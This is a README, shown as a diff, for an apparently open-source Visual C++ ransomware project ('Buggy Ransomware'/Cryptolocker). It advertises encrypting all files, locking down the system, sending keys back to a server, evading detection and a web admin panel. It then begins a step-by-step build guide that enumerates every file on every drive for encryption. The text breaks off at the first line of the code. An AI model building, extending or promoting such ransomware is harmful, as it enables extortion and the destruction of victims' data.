ajayrandhawa/Cryptolocker/README.md

 Buggy Ransomware is open source  Crypto-Locker.
 Buggy Ransomware is developed in Visual C++.
 It has features encrypt all file, lock down the system and send keys back to the server.
 Multi-threaded functionality helps to this tool make encryption faster.

+## Features

+1. Strong AES Encryption.
+(Unbreakable)
+2. LockDown System Functionailty.
+3. Multi-Thread Encryption.
+4. Undetectable.
+5. Powerful Web Admin Interface

 ## Step 1 (Fetch files)

 Getting all files from all drive to encrypting them.

 Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use.
+I use Boost C++ libraries to get all files list.
+Please first setup Boost libraries to compile program.

 ```
 #include <boost/config/warning_disable.hpp>